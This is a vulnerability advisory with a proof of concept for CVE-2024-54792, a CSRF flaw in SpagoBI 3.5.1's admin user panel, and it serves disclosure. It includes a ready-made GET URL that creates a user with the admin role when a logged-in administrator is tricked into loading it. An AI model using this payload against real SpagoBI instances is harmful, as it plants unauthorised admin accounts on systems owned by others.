SpagoBI csrf# CVE-2024-54792
**Severity :** **Medium** (**6.1**)
**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
## Summary :
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.
## Poc
The add/edit/delete user panel, accessible by the admin user, do not contains csrf countermeasures.
### Steps to Reproduce :
1. Embed this url customizing it with: **victim_host**, **custom_username** and **custom_password** and into HTML page that makes the request and trick a victim with admin rights logged into the page to visit it. A new user will be created in the platform.
```
https://<victim_host>/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=<custom_username>&fullName=<custom_username>&id=0&pwd=<custom_password>&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
```
## Affected Version Details :
- <= 3.5.1
## Impact :
The attacker can trick a victim logged with admin rights to perform a GET request that inserts a user with ad hoc credentials in the platform unconsciously, due to the lack of CSRF countermeasures. Then he can log in with the previously selected credentials.
## Mitigation :
- Update to the latest version.
## References :
-
[4.0K] /data/pocs/c816e8797cded0824cb75cdb34b0cf5d6a314e11
└── [1.4K] README.md
0 directories, 1 file